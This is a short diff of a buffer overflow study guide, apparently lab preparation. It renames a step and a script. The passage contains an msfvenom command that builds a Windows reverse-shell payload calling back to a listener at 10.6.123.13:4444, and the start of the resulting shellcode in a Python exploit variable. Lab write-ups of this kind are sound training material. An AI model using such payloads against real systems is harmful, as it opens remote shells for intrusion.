Fz3r0/Fz3r0/Cyber-Security-&-Hacking/Buffer-Overflow/Buffer_Overflow-Prep.md

 ---

-### Generate Payload
+### 5. Generate the final Payload

 - Run the following `msfvenom` command on Kali, using your Kali `VPN IP` as the `LHOST` and updating the `-b` option with all the badchars you identified (including `\x00`):

     - `msfvenom -p windows/shell_reverse_tcp LHOST=10.6.123.13 LPORT=4444 EXITFUNC=thread -b "\x00" -f c`

-- Copy the generated `C code strings` and integrate them into a new modifies python script called `overflow1_step5_generatePayload.py` script payload variable using the following notation:
+- Copy the generated `C code strings` and integrate them into a new modifies python script called `overflow1_step567_Final_Payload.py` script payload variable using the following notation:

 ```python
 payload = ("\xfc\xbb\xa1\x8a\x96\xa2\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"